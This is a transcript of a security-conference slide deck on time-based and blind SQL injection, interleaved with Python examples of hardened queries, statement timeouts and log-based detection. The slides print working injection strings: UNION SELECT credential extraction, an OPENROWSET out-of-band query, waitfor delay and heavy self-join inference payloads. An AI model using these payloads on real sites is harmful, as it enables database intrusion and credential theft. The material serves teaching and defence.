time based sql injections


  • 7/31/2019 Time Based SQL Injections

    1/27

    2008 Security-Assessment.com

    Time Based SQL Injection

    Presented by Muhaimin Dzulfakar

  • 2/27

    Who am I

    Muhaimin Dzulfakar

    Security Consultant, Security-Assessment.com

    Application and network pen-tester

  • 3/27

    Agenda

    What is time based SQL Injection

    Differences between blind and time based SQL Injection

    Time based injection with heavy queries

    Limitation of time based SQL Injection

  • 4/27

    Different types of SQL Injection

    In Band Injection

    Out of Band Injection

    Blind SQL Injection

    Time Based SQL Injection

  • 5/27

    In Band Injection

    Results are embedded via UNION SELECT

    Useful when the SQL error message is displayed

    Fastest way to extract data

    Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL SELECT null, null, null, null, concat(username,0x3a,admin_password), null FROM admin/*

  • 6/27

    In Band Injection (screenshot slide; image not in transcript)

  • 7/27

    Out of Band Injection

    Use a different communication channel to drill for data

    Ex: a web mail application in which data received via SMTP is processed

    Example of attack: accessing your neighbour's database server with OOB injection

    Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT user, pass FROM users') AS a--

  • 8/27

    Out of Band Injection

    (Diagram: web server www.buyviagra.com in front of Database A; the OOB injection reaches Database B at 10.1.1.1)

  • 9/27

    Blind SQL Injection

    Application generates a custom error message for a failed response and the normal page for a successful response

    Comparison between true and false response:

    AND 1=1 -> true

    AND 1=2 -> false

    Read data byte by byte

  • 10/27

    Blind SQL Injection (screenshot slide; image not in transcript)

  • 11/27

    Blind SQL Injection (screenshot slide; image not in transcript)

  • 12/27

    Time Based SQL Injection

    Use a time delay to differentiate between true and false

    True response: the time delay is executed

    Failed response: the time delay is not executed

    Read data byte by byte, exactly the same method as blind injection

    First example in Chris Anley's paper "More Advanced SQL Injection"

    Another example is in David Litchfield's paper "Data Mining with SQL Injection and Inference"

  • 13/27

    When we need Time Based SQL Injection

    When the application generates the default page for a true or false response

    When the application generates the same custom error page for a true or false response

    Injection is successful but can't be seen by the attacker

  • 14/27

    Scenario 1 (Blind Injection attack)

    $default=1
    if value is not between 1-20
    {
        redirect user to page.php?id=$default
        execute SQL statement
    }

    1 AND 1=1 [TRUE] -> default page displayed
    1 AND 1=2 [FALSE] -> default page displayed

    BLIND INJECTION FAILED!

  • 15/27

    Scenario 1 (Time Based Blind Injection attack)

    $default=1
    if value is not between 1-20
    {
        redirect user to page.php?id=$default
        execute SQL statement
    }

    1 AND 1=1 [TRUE] -> takes 5 seconds to respond
    1 AND 1=2 [FALSE] -> takes 1 second to respond

    TIME BASED BLIND INJECTION WORKS!

  • 16/27

    Time Based SQL Injection

    TRUE = 2478 ms, FALSE = 117 ms
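The scenario on the preceding slides (the same default page for TRUE and FALSE, only the response time differs) comes down to what the application lets reach the database. The following Python/sqlite3 code is an added example, not part of the presentation: it models the slide's pseudocode (a $default of 1, a 1-20 range check done on a loosely coerced value, the default page shown when nothing matches) and contrasts it with a lookup that parses the id strictly and binds it as a parameter. The pages table, the function names (lookup_vulnerable, lookup_safe, what_reaches_the_db) and the sample rows are assumptions made for the example.

```python
import re
import sqlite3

DEFAULT_ID = "1"            # the slide's $default
VALID_RANGE = range(1, 21)  # "between 1-20"


def make_db():
    """Constructed sample data: twenty pages with ids 1..20 (not from the presentation)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages(id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(i, f"page {i}") for i in VALID_RANGE])
    conn.commit()
    return conn


def loose_int(value):
    """Loosely typed numeric check in the style of a PHP (int) cast: leading digits
    count and everything after them is ignored, so '1 AND 1=1' reads as 1."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


class SqlRecorder:
    """Records the text of the last statement the database engine actually ran."""

    def __init__(self, conn):
        self.last_sql = None
        conn.set_trace_callback(self._trace)

    def _trace(self, sql):
        self.last_sql = sql


def lookup_vulnerable(conn, raw_id):
    """The slide's pattern: range check on the coerced value, the raw string spliced
    into the SQL, and the default page shown when nothing comes back. TRUE and FALSE
    injections therefore render the same page; only the execution time can differ."""
    if loose_int(raw_id) not in VALID_RANGE:
        raw_id = DEFAULT_ID                      # "redirect user to page.php?id=$default"
    row = conn.execute(f"SELECT title FROM pages WHERE id = {raw_id}").fetchone()
    if row is None:                              # nothing matched: show the default page
        row = conn.execute(f"SELECT title FROM pages WHERE id = {DEFAULT_ID}").fetchone()
    return row[0]


def lookup_safe(conn, raw_id):
    """Hardened form: strict integer parse, then parameter binding. Attacker-supplied
    text never becomes part of the statement, so there is nothing to attach a delay to."""
    try:
        page_id = int(raw_id.strip())
    except ValueError:
        page_id = int(DEFAULT_ID)
    if page_id not in VALID_RANGE:
        page_id = int(DEFAULT_ID)
    row = conn.execute("SELECT title FROM pages WHERE id = ?", (page_id,)).fetchone()
    return row[0]


def what_reaches_the_db(lookup, raw_id):
    """Run one lookup on a fresh database; return (page shown, SQL the engine executed)."""
    conn = make_db()
    rec = SqlRecorder(conn)
    page = lookup(conn, raw_id)
    return page, rec.last_sql


if __name__ == "__main__":
    for payload in ("5", "1 AND 1=1", "1 AND 1=2"):
        print("vulnerable", repr(payload), "->", what_reaches_the_db(lookup_vulnerable, payload))
        print("safe      ", repr(payload), "->", what_reaches_the_db(lookup_safe, payload))
```

Both versions show "page 1" for the two probes, which is exactly why the blind comparison on slide 14 fails; the difference is in the recorded SQL. The vulnerable lookup executes "WHERE id = 1 AND 1=1" as written by the client, while the safe lookup only ever sends the fixed statement with a bound integer, so the range check stops being the only defence.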

  • 17/27

    Spot the difference

    Blind Injection (for MySQL)

    1 AND ASCII(substring((@@version),1,1))

  • 18/27

    Spot the difference

    Time Based Blind Injection (for MySQL)

    1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)

  • 19/27

    Time Based Injection on MSSQL

    Time Based Injection (MSSQL)

    1 AND if not(substring((select @@version),25,1) < 52) waitfor delay '0:0:9'--

    If the first character is less than 4, execute waitfor delay

    (The slide annotates the parts of the statement: query, position, operator, char, and time delay)

  • 20/27

    Other Databases

    Oracle (without PL/SQL support), MS Access and DB2 do not have delay functions

    Time Based Injection is possible by using heavy queries

    Chema Alonso and Jose Prada talked about this at Defcon 2008

    2 types of conditions in the 'where clause':

    Light condition first

    Heavy condition first

    Select A from B where ConditionA and ConditionB

  • 21/27

    Heavy condition first

    Result from Alonso research (light condition alone: 10 sec; heavy condition alone: 100 sec)

    Heavy condition (first) | Light condition (second) | Result | Time
    False                   | not evaluated            | False  | 100 seconds
    True                    | True                     | True   | 110 seconds
    True                    | False                    | False  | 110 seconds

  • 22/27

    Light condition first

    Result from Alonso research (light condition alone: 10 sec; heavy condition alone: 100 sec)

    Light condition (first) | Heavy condition (second) | Result | Time
    False                   | not evaluated            | False  | 10 seconds
    True                    | True                     | True   | 110 seconds
    True                    | False                    | False  | 110 seconds

  • 23/27

    Heavy Queries

    Oracle evaluates the conditions from left to right

    MS Access evaluates the conditions from right to left

    MSSQL evaluates the light condition first

    Table name needs to be known

    Some of the well known default tables:

    MSSQL - sysusers

    MySQL - information_schema.columns

    Oracle - all_users

  • 24/27

    Heavy Queries

    Example of time based injection using heavy queries on MSSQL (light condition evaluates first)

    1 AND (select count(*) FROM sysusers as sys1, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8) > 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)

    (The slide annotates the count(*) over the eight-way self-join as the heavy query and the ASCII comparison as the light query)

    Suitable for databases that do not support time delay functions

    Ex: Oracle and MS Access
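Heavy-query inference only works because the database is allowed to spend many seconds on a single statement, so a per-statement execution budget blunts it on engines without delay functions just as it blunts waitfor delay or SLEEP elsewhere. The following Python/sqlite3 code is an added example, not from the presentation: it uses SQLite's progress handler to abort any statement that runs past a time budget, and exercises it with an eight-way self-join modelled on the sysusers example above over a constructed users table. make_db, run_with_deadline, the budget value and the sample rows are assumptions of the example; MySQL's max_execution_time system variable and a client-side command timeout on SQL Server serve the same purpose in production and are not touched by this code.

```python
import sqlite3
import time


def make_db(rows=50):
    """Constructed sample table standing in for a catalogue table such as sysusers."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)",
                     [(f"user{i}",) for i in range(rows)])
    conn.commit()
    return conn


def run_with_deadline(conn, sql, params=(), budget_s=0.2, check_every=1000):
    """Execute sql, aborting it if it runs longer than budget_s seconds.

    SQLite calls the progress handler every check_every virtual-machine instructions;
    a non-zero return value interrupts the running statement, which surfaces as an
    OperationalError('interrupted'). Returns ("ok", rows) or ("aborted", elapsed_s)."""
    start = time.monotonic()
    deadline = start + budget_s

    def over_budget():
        return 1 if time.monotonic() > deadline else 0   # non-zero aborts the statement

    conn.set_progress_handler(over_budget, check_every)
    try:
        return ("ok", conn.execute(sql, params).fetchall())
    except sqlite3.OperationalError as exc:
        if "interrupt" in str(exc).lower():
            return ("aborted", time.monotonic() - start)
        raise
    finally:
        conn.set_progress_handler(None, check_every)      # clear the handler afterwards


# A cheap count, and the eight-way cross join that mirrors the slide's heavy condition:
# 50 rows joined to itself eight times is 50**8 row combinations to walk through.
LIGHT = "SELECT count(*) FROM users"
HEAVY = ("SELECT count(*) FROM users AS s1, users AS s2, users AS s3, users AS s4, "
         "users AS s5, users AS s6, users AS s7, users AS s8")


if __name__ == "__main__":
    conn = make_db()
    print("light:", run_with_deadline(conn, LIGHT))
    status, elapsed = run_with_deadline(conn, HEAVY, budget_s=0.2)
    print(f"heavy: {status} after {elapsed:.2f}s")
```

The budget should sit a little above the slowest legitimate statement on the endpoint; with that in place a heavy condition cannot stretch the response to the 100-second mark the Alonso figures rely on, and the aborted statement is itself a useful event to log.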

  • 25/27

    Limitation

    Results are not efficient during busy times

    Time delay results also depend on how much data is stored in the table
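The same timing signal that the attacker reads (117 ms versus 2478 ms on slide 16, or a 9-second waitfor delay) is visible to the defender in web server logs. The following Python code is an added example, not part of the presentation: it runs simple detection logic over a handful of constructed access-log lines, flagging requests whose query-string values carry a delay function, an AND 1=1 / AND 1=2 probe or a repeated self-join, and separately flagging requests whose response time is far above the baseline of signature-free requests to the same path. The log layout (common log format with a trailing response-time field in milliseconds), the sample lines, the thresholds and the function names are assumptions of the example.

```python
import re
import statistics
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log, not real traffic. The third and fourth lines carry the
# page's AND 1=2 / AND 1=1 probes; the fifth carries the page's MSSQL waitfor delay
# statement, URL-encoded as a browser would send it.
LOG_LINES = [
    '10.0.0.5 - - [31/Jul/2019:10:00:01 +0000] "GET /buy.php?id=1 HTTP/1.1" 200 512 117',
    '10.0.0.5 - - [31/Jul/2019:10:00:02 +0000] "GET /buy.php?id=2 HTTP/1.1" 200 512 121',
    '10.0.0.9 - - [31/Jul/2019:10:00:03 +0000] "GET /buy.php?id=1%20AND%201%3D2 HTTP/1.1" 200 512 117',
    '10.0.0.9 - - [31/Jul/2019:10:00:09 +0000] "GET /buy.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 2478',
    '10.0.0.9 - - [31/Jul/2019:10:00:15 +0000] "GET /buy.php?id=1%20AND%20if%20not(substring((select%20@@version),25,1)%3C52)%20waitfor%20delay%20%270:0:9%27-- HTTP/1.1" 200 512 9130',
    '10.0.0.5 - - [31/Jul/2019:10:00:16 +0000] "GET /buy.php?id=3 HTTP/1.1" 200 512 119',
]

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rt_ms>\d+)$')

# Payload markers discussed in the presentation: delay functions, the AND 1=1 / AND 1=2
# comparison, and one table self-joined repeatedly (the heavy-query construction).
SIGNATURES = {
    "delay_function": re.compile(
        r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay|dbms_lock\.sleep)\b", re.I),
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "self_join": re.compile(
        r"\b(\w+)\s+as\s+\w+\s*,\s*\1\s+as\s+\w+\s*,\s*\1\s+as\b", re.I),
}


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)  # URL-decoded pairs
    rec["rt_ms"] = int(rec["rt_ms"])
    return rec


def signature_hits(rec):
    """Names of the payload signatures found in any query-string value of the request."""
    return {name for _, value in rec["params"]
            for name, rx in SIGNATURES.items() if rx.search(value)}


def analyze(lines, outlier_factor=5, outlier_floor_ms=1000):
    """Return findings for requests that carry a payload signature and/or whose response
    time is far above the median of signature-free requests to the same path. A
    time-based probe leaves the bimodal fast/slow pattern the slides show."""
    records = [(i, parse_line(line)) for i, line in enumerate(lines)]
    records = [(i, r) for i, r in records if r]
    baseline = {}
    for _, r in records:
        if not signature_hits(r):
            baseline.setdefault(r["path"], []).append(r["rt_ms"])
    findings = []
    for i, r in records:
        reasons = signature_hits(r)
        clean = baseline.get(r["path"])
        if clean:
            median = statistics.median(clean)
            if r["rt_ms"] > max(outlier_factor * median, median + outlier_floor_ms):
                reasons.add("latency_outlier")
        if reasons:
            findings.append({"line": i, "client": r["client"], "path": r["path"],
                             "rt_ms": r["rt_ms"], "reasons": sorted(reasons)})
    return findings


if __name__ == "__main__":
    for finding in analyze(LOG_LINES):
        print(finding)
```

The latency rule is what catches the slide-25 limitation from the other side: on a busy server the attacker's timing oracle gets noisy, but a request that takes several seconds where its neighbours take 120 ms is still an outlier worth correlating with the client address, and the signature rule catches the probe even when the delay never fires.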

  • 26/27

    (image slide; no text in transcript)

  • 27/27

    Question?

    [email protected]